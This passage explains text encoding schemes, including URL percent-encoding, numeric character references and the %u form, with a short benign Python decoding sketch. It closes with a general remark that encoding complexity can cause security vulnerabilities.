We now have quite an assortment of encoding options: ASCII, ISO-8859-1, UCS-2, UCS-4, UTF-7, UTF-8, UTF-16, and UTF-32. It gets even more interesting when you add in the World Wide Web. Some regular ASCII characters have special meaning in URLs, so a scheme was developed to encode those in a special way on top of a normal ASCII encoding. This is known as URL encoding and is specified in RFC 1738. In this encoding format a special character is represented by a percent symbol followed by two hex digits, which specify the code of the character that is being represented. For example, a space is represented as %20. But because one standard will never do when you can have two, there is another way to represent characters which aren’t allowed in a URL. The ISO also specifies the Numeric Character Reference (NCR) as a way to represent characters from the UCS in various markup languages. An NCR is a sequence of decimal or hex digits preceded by an ampersand and a hash mark and terminated by a semicolon. A literal x follows the hash if the digits are in hexadecimal. &#931; and &#x3A3; are examples of NCR encoding; both represent Σ. It’s also possible to encode UCS characters using the URL encoding format by prepending the code point with a %u.
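These web-layer encodings can be tried out with Python's standard library. The sketch below uses urllib.parse for URL encoding and html.unescape for character references. The %u form is nonstandard and has no standard library decoder that I know of, so percent_u_decode is a hypothetical helper that assumes exactly four hex digits after the %u.

```python
# Sketch: URL encoding, numeric character references, and the %u form.
import html
import re
from urllib.parse import quote, unquote

print(quote(" "))                 # %20
print(unquote("%20") == " ")      # True

# Decimal and hexadecimal references to the same character.
print(html.unescape("&#931;") == "\u03a3")    # True
print(html.unescape("&#x3A3;") == "\u03a3")   # True

def percent_u_decode(text: str) -> str:
    """Hypothetical decoder for %uXXXX sequences (assumes four hex digits)."""
    return re.sub(r"%u([0-9A-Fa-f]{4})",
                  lambda match: chr(int(match.group(1), 16)),
                  text)

print(percent_u_decode("%u03A3") == "\u03a3")  # True
```

A filter that understands only one of these forms will miss the same character written in any of the others, which is where the trouble starts.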

With all these different encoding schemes it’s easy to see how the seemingly simple task of interpreting text can become very complex. Areas of complexity make it hard for programmers to understand exactly what their programs are doing. That lack of understanding leads to vulnerabilities. Until the encoding landscape gets simpler and robust libraries for translating from one encoding scheme to another are commonplace, security professionals will have to keep an eye on this area.
